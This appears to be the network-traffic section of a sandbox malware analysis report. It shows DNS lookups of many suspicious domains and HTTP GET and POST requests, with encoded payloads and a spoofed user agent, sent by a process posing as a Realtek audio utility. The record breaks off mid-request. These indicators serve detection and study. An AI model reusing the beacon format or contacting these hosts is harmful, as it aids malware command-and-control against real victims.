Jan 13, 2025 10:25:41.844552040 CET	58644	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:25:41.947135925 CET	53	58644	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 10:21:10.051074028 CET	192.168.11.20	1.1.1.1	0xd345	Standard query (0)	www.milp.store	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:25.822415113 CET	192.168.11.20	1.1.1.1	0xd8b7	Standard query (0)	www.chiro.live	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:39.273241043 CET	192.168.11.20	1.1.1.1	0xab76	Standard query (0)	www.mzkd6gp5.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:53.472506046 CET	192.168.11.20	1.1.1.1	0xbddf	Standard query (0)	www.bokus.site	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:07.000752926 CET	192.168.11.20	1.1.1.1	0xafdf	Standard query (0)	www.elettrocoltura.info	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:15.217762947 CET	192.168.11.20	1.1.1.1	0x4a25	Standard query (0)	www.givvjn.info	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:30.417587996 CET	192.168.11.20	1.1.1.1	0xa732	Standard query (0)	www.bonheur.tech	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:44.648926973 CET	192.168.11.20	1.1.1.1	0xfdd4	Standard query (0)	www.rpa.asia	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:59.786148071 CET	192.168.11.20	1.1.1.1	0x31ca	Standard query (0)	www.ogbos88.cyou	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:23:13.017795086 CET	192.168.11.20	1.1.1.1	0x6691	Standard query (0)	www.smartbath.shop	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:23:21.172928095 CET	192.168.11.20	1.1.1.1	0x42b9	Standard query (0)	www.100millionjobs.africa	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:23:40.433662891 CET	192.168.11.20	1.1.1.1	0xcf66	Standard query (0)	www.mirenzhibo.net	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:23:55.602298021 CET	192.168.11.20	1.1.1.1	0xa05c	Standard query (0)	www.nextlevel.finance	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:24:11.005206108 CET	192.168.11.20	1.1.1.1	0x6be4	Standard query (0)	www.furrcali.xyz	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:24:24.767853975 CET	192.168.11.20	1.1.1.1	0xd07e	Standard query (0)	www.buyspeechst.shop	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:24:38.108763933 CET	192.168.11.20	1.1.1.1	0xd3e0	Standard query (0)	www.lejgnu.info	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:25:41.844552040 CET	192.168.11.20	1.1.1.1	0xac2f	Standard query (0)	www.elettrocoltura.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 10:21:10.356240034 CET	1.1.1.1	192.168.11.20	0xd345	No error (0)	www.milp.store		194.9.94.86	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:10.356240034 CET	1.1.1.1	192.168.11.20	0xd345	No error (0)	www.milp.store		194.9.94.85	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:26.019773960 CET	1.1.1.1	192.168.11.20	0xd8b7	No error (0)	www.chiro.live		45.56.79.23	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:26.019773960 CET	1.1.1.1	192.168.11.20	0xd8b7	No error (0)	www.chiro.live		45.33.20.235	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:26.019773960 CET	1.1.1.1	192.168.11.20	0xd8b7	No error (0)	www.chiro.live		45.33.23.183	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:26.019773960 CET	1.1.1.1	192.168.11.20	0xd8b7	No error (0)	www.chiro.live		45.79.19.196	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:26.019773960 CET	1.1.1.1	192.168.11.20	0xd8b7	No error (0)	www.chiro.live		96.126.123.244	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:26.019773960 CET	1.1.1.1	192.168.11.20	0xd8b7	No error (0)	www.chiro.live		72.14.185.43	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:26.019773960 CET	1.1.1.1	192.168.11.20	0xd8b7	No error (0)	www.chiro.live		45.33.18.44	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:26.019773960 CET	1.1.1.1	192.168.11.20	0xd8b7	No error (0)	www.chiro.live		72.14.178.174	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:26.019773960 CET	1.1.1.1	192.168.11.20	0xd8b7	No error (0)	www.chiro.live		173.255.194.134	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:26.019773960 CET	1.1.1.1	192.168.11.20	0xd8b7	No error (0)	www.chiro.live		198.58.118.167	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:26.019773960 CET	1.1.1.1	192.168.11.20	0xd8b7	No error (0)	www.chiro.live		45.33.2.79	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:26.019773960 CET	1.1.1.1	192.168.11.20	0xd8b7	No error (0)	www.chiro.live		45.33.30.197	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:39.912256002 CET	1.1.1.1	192.168.11.20	0xab76	No error (0)	www.mzkd6gp5.top		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:39.912256002 CET	1.1.1.1	192.168.11.20	0xab76	No error (0)	www.mzkd6gp5.top		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:39.912256002 CET	1.1.1.1	192.168.11.20	0xab76	No error (0)	www.mzkd6gp5.top		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:39.912256002 CET	1.1.1.1	192.168.11.20	0xab76	No error (0)	www.mzkd6gp5.top		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:39.912256002 CET	1.1.1.1	192.168.11.20	0xab76	No error (0)	www.mzkd6gp5.top		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:39.912256002 CET	1.1.1.1	192.168.11.20	0xab76	No error (0)	www.mzkd6gp5.top		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:39.912256002 CET	1.1.1.1	192.168.11.20	0xab76	No error (0)	www.mzkd6gp5.top		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:53.579878092 CET	1.1.1.1	192.168.11.20	0xbddf	No error (0)	www.bokus.site		199.192.21.169	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:07.159527063 CET	1.1.1.1	192.168.11.20	0xafdf	Name error (3)	www.elettrocoltura.info	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:15.539438009 CET	1.1.1.1	192.168.11.20	0x4a25	No error (0)	www.givvjn.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:30.526417017 CET	1.1.1.1	192.168.11.20	0xa732	No error (0)	www.bonheur.tech		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:30.526417017 CET	1.1.1.1	192.168.11.20	0xa732	No error (0)	www.bonheur.tech		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:45.403894901 CET	1.1.1.1	192.168.11.20	0xfdd4	No error (0)	www.rpa.asia		160.25.166.123	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:59.905673027 CET	1.1.1.1	192.168.11.20	0x31ca	No error (0)	www.ogbos88.cyou		172.67.132.227	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:59.905673027 CET	1.1.1.1	192.168.11.20	0x31ca	No error (0)	www.ogbos88.cyou		104.21.13.141	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:23:13.120079041 CET	1.1.1.1	192.168.11.20	0x6691	Name error (3)	www.smartbath.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:23:21.855506897 CET	1.1.1.1	192.168.11.20	0x42b9	No error (0)	www.100millionjobs.africa	100millionjobs.africa		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 10:23:21.855506897 CET	1.1.1.1	192.168.11.20	0x42b9	No error (0)	100millionjobs.africa		136.243.64.147	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:23:41.026813030 CET	1.1.1.1	192.168.11.20	0xcf66	No error (0)	www.mirenzhibo.net		202.95.11.110	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:23:55.872288942 CET	1.1.1.1	192.168.11.20	0xa05c	No error (0)	www.nextlevel.finance		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:23:55.872288942 CET	1.1.1.1	192.168.11.20	0xa05c	No error (0)	www.nextlevel.finance		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:24:11.279006004 CET	1.1.1.1	192.168.11.20	0x6be4	No error (0)	www.furrcali.xyz		103.106.67.112	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:24:24.889484882 CET	1.1.1.1	192.168.11.20	0xd07e	No error (0)	www.buyspeechst.shop		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:24:24.889484882 CET	1.1.1.1	192.168.11.20	0xd07e	No error (0)	www.buyspeechst.shop		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:24:24.889484882 CET	1.1.1.1	192.168.11.20	0xd07e	No error (0)	www.buyspeechst.shop		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:24:24.889484882 CET	1.1.1.1	192.168.11.20	0xd07e	No error (0)	www.buyspeechst.shop		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:24:24.889484882 CET	1.1.1.1	192.168.11.20	0xd07e	No error (0)	www.buyspeechst.shop		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:24:24.889484882 CET	1.1.1.1	192.168.11.20	0xd07e	No error (0)	www.buyspeechst.shop		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:24:24.889484882 CET	1.1.1.1	192.168.11.20	0xd07e	No error (0)	www.buyspeechst.shop		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:24:38.212935925 CET	1.1.1.1	192.168.11.20	0xd3e0	No error (0)	www.lejgnu.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:25:41.947135925 CET	1.1.1.1	192.168.11.20	0xac2f	Name error (3)	www.elettrocoltura.info	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.milp.store

www.chiro.live

www.mzkd6gp5.top

www.bokus.site

www.givvjn.info

www.bonheur.tech

www.rpa.asia

www.ogbos88.cyou

www.100millionjobs.africa

www.mirenzhibo.net

www.nextlevel.finance

www.furrcali.xyz

www.buyspeechst.shop

www.lejgnu.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49770	194.9.94.86	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:10.572426081 CET	528	OUT	GET /js1x/?v1GdZ=vUN3&AuPF3v=YzadGC6YqOgjY/9qwmEESxfA+8MKCZxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswMKkfsup8/2EYKLr6Ec= HTTP/1.1 Host: www.milp.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:21:10.784209967 CET	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 09:21:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 13, 2025 10:21:10.784317970 CET	1289	IN	Data Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61 Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
Jan 13, 2025 10:21:10.784456015 CET	1289	IN	Data Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
Jan 13, 2025 10:21:10.784585953 CET	1289	IN	Data Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
Jan 13, 2025 10:21:10.784688950 CET	661	IN	Data Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
Jan 13, 2025 10:21:10.784699917 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49771	45.56.79.23	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:26.156018019 CET	793	OUT	POST /jwa9/ HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.chiro.live Referer: http://www.chiro.live/jwa9/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 4a 51 5a 33 37 4c 6f 44 49 59 30 2f 43 6e 6b 43 57 72 52 43 67 3d 3d Data Ascii: AuPF3v=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoJQZ37LoDIY0/CnkCWrRCg==
Jan 13, 2025 10:21:26.293402910 CET	803	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Mon, 13 Jan 2025 09:21:26 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4b 73 9b 30 10 be e7 57 50 0e 99 76 a6 06 e3 b7 1b 48 27 a1 f1 ab c4 4e 1c 27 18 5f 32 42 52 2c 11 21 51 10 60 a7 d3 ff 5e 30 9d 98 8e 7b a8 0e 92 76 b5 fb ed ee b7 5a f3 c3 b7 85 bd f2 ee 6e 14 22 43 76 79 66 96 87 c2 00 df 5a 2a e6 ea e5 99 52 2c 93 60 80 aa eb 41 0c b1 04 0a 24 20 4e b0 b4 d4 c7 d5 a8 31 f8 63 79 7c 26 52 46 0d fc 23 a5 99 a5 ee 1a 29 68 40 11 46 40 52 9f 61 55 81 82 4b cc 0b df e9 8d 85 d1 16 9f 78 73 10 62 4b cd 28 ce 23 11 cb 9a 43 4e 91 24 16 c2 19 85 b8 71 10 3e 2b 94 53 49 01 6b 24 10 30 6c 19 5a b3 0e 27 a9 64 f8 d2 d4 ab f3 50 ce 21 49 2e 12 18 d3 48 1e cb fa 77 ee 31 7e 89 71 42 6a 29 34 2f d2 98 59 65 7d 5f 74 3d cf f3 7e 53 83 84 c6 42 63 34 c3 ba aa e8 47 48 53 3f 0d 63 1e d8 ab d3 73 1a a2 fb 7f 21 4c fd d8 18 d3 17 68 af 08 ce 04 40 96 8a c4 73 75 fd f8 a9 4e 46 55 b2 22 f7 51 c1 ae c4 3b a9 07 20 03 95 b6 66 57 32 f1 92 72 28 a9 e0 4a 0d 4a f9 f9 ce 5f 69 52 ae 9c 72 24 72 4d 8a 48 63 02 16 fd 15 5c 23 45 41 8a a5 [TRUNCATED] Data Ascii: 263SKs0WPvH'N'_2BR,!Q`^0{vZn"CvyfZR,`A$ N1cy\|&RF#)h@F@RaUKxsbK(#CN$q>+SIk$0lZ'dP!I.Hw1~qBj)4/Ye}_t=~SBc4GHS?cs!Lh@suNFU"Q; fW2r(JJ_iRr$rMHc\#EAG9~Fq$YFAOk{o`tB?xXx?3`J:^c_Qo=p?MASYn&d/ CmvY,;64)_2<d)}{G:1\|:Tz<?f^F~,7[uLz.bNkW`dzPB{oE=U8\n{YGiGAo~6T/w_RL~E0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49772	45.56.79.23	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:28.816634893 CET	813	OUT	POST /jwa9/ HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.chiro.live Referer: http://www.chiro.live/jwa9/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 6b 61 79 78 57 75 46 65 38 4c 35 76 66 52 6a 54 69 51 6e 4a 79 74 4b 70 4c 38 2f 34 30 43 4f 6e 32 69 45 4e 73 58 62 39 56 39 46 71 39 67 42 38 6d 30 46 62 54 50 4f 52 34 78 58 52 72 6f 66 30 6b 4e 38 75 62 65 47 6a 46 4b 2b 36 6f 54 48 33 78 52 77 78 31 38 35 49 4d 4b 6e 50 4a 4b 2b 67 74 54 79 6a 2b 61 43 4e 45 4a 36 59 36 79 75 4e 35 65 64 59 68 68 34 46 6d 77 4c 65 55 65 50 32 72 39 6b 2f 64 44 71 4a 2f 4d 41 62 45 47 37 79 65 4d 41 55 71 4b 66 72 59 73 44 71 70 43 36 4f 7a 4f 78 54 6f 31 7a 42 7a 78 53 6b 49 3d Data Ascii: AuPF3v=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfkayxWuFe8L5vfRjTiQnJytKpL8/40COn2iENsXb9V9Fq9gB8m0FbTPOR4xXRrof0kN8ubeGjFK+6oTH3xRwx185IMKnPJK+gtTyj+aCNEJ6Y6yuN5edYhh4FmwLeUeP2r9k/dDqJ/MAbEG7yeMAUqKfrYsDqpC6OzOxTo1zBzxSkI=
Jan 13, 2025 10:21:28.950093985 CET	805	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Mon, 13 Jan 2025 09:21:28 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 db 72 9b 30 10 7d cf 57 50 1e 32 ed 4c cd c5 77 37 90 4e e2 c6 b7 12 3b 71 9c 80 fd 92 11 92 62 89 08 89 82 00 3b 9d fe 7b c1 74 62 3a ee 43 f5 80 b4 cb ee d9 3d 67 25 eb c3 b7 c5 70 b5 be bb 51 88 0c d9 e5 99 55 6e 0a 03 7c 6b ab 98 ab 97 67 4a b1 2c 82 01 aa 8e 07 33 c4 12 28 90 80 38 c1 d2 56 1f 57 a3 46 ff 4f e4 f1 37 91 32 6a e0 1f 29 cd 6c 75 d7 48 41 03 8a 30 02 92 fa 0c ab 0a 14 5c 62 5e e4 4e 6f 6c 8c b6 f8 24 9b 83 10 db 6a 46 71 1e 89 58 d6 12 72 8a 24 b1 11 ce 28 c4 8d 83 f1 59 a1 9c 4a 0a 58 23 81 80 61 db d4 8c 3a 9c a4 92 e1 4b 4b af f6 03 9d 43 93 5c 24 30 a6 91 3c d2 fa 77 ef 31 7e 89 71 42 6a 2d 18 17 69 cc ec 92 df 17 5d cf f3 bc 67 68 90 d0 58 68 8c 66 58 57 15 fd 08 69 e9 a7 65 ac 83 7a 75 79 4e 4b 74 fe af 84 a5 1f 07 63 f9 02 ed 15 c1 99 00 c8 56 91 78 ae 8e 1f 3f d5 c5 a8 28 2b 72 1f 15 ea 4a bc 93 7a 00 32 50 79 6b 71 a5 12 2f 29 87 92 0a ae d4 a0 94 9f ef fa 95 21 e5 ca 29 47 22 d7 a4 88 34 26 60 31 5f c1 35 52 10 52 6c 45 [TRUNCATED] Data Ascii: 265Sr0}WP2Lw7N;qb;{tb:C=g%pQUn\|kgJ,3(8VWFO72j)luHA0\b^Nol$jFqXr$(YJX#a:KKC\$0<w1~qBj-i]ghXhfXWiezuyNKtcVx?(+rJz2Pykq/)!)G"4&`1_5RRlE=JT(6 )>iJmZ^0}0Ft[ &6LN3jW^7p?Npo&d/h?C-r,s]pDb;K',?8N;'h2_}7OuYlgxl&v8c&.bNs0]#y8pg(i7tG0N&}r@k:-K_uK/oJY[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49773	45.56.79.23	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:31.472362041 CET	2578	OUT	POST /jwa9/ HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.chiro.live Referer: http://www.chiro.live/jwa9/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 73 61 79 44 4f 75 45 35 41 4c 34 76 66 52 70 7a 69 52 6e 4a 7a 6f 4b 70 44 77 2f 34 70 31 4f 6c 4f 69 46 76 6b 58 58 63 56 39 4f 71 39 67 4d 63 6d 78 42 62 54 67 4f 52 6f 4c 58 52 37 6f 66 30 6b 4e 38 74 54 65 42 79 46 4b 38 36 6f 4d 51 48 78 56 6d 42 30 6a 35 49 56 6f 6e 50 64 38 39 52 4e 54 78 44 75 61 4f 66 73 4a 6e 49 36 30 74 4e 35 47 64 59 63 2f 34 46 36 57 4c 64 49 34 50 31 37 39 6b 34 77 4d 35 37 58 6b 52 74 45 64 36 7a 75 32 49 32 75 67 58 4d 4d 4c 4d 5a 70 71 36 4f 79 63 2b 54 77 4f 6b 77 2f 30 47 6a 63 46 42 43 44 37 51 64 43 61 4e 65 54 61 39 41 5a 42 46 71 71 33 35 71 59 4d 4d 31 53 4d 54 6c 52 57 68 58 7a 4c 41 5a 6c 46 4b 49 48 49 4c 4c 49 73 61 31 70 66 59 4a 2b 56 76 4b 77 55 53 33 62 56 58 31 61 53 6c 71 43 7a 78 48 75 73 6b 58 51 52 67 49 63 78 55 57 4a 47 66 72 4e 76 43 71 50 78 62 53 64 56 48 36 45 4d 7a 74 4a 4d 54 58 69 6f 63 55 32 [TRUNCATED] Data Ascii: 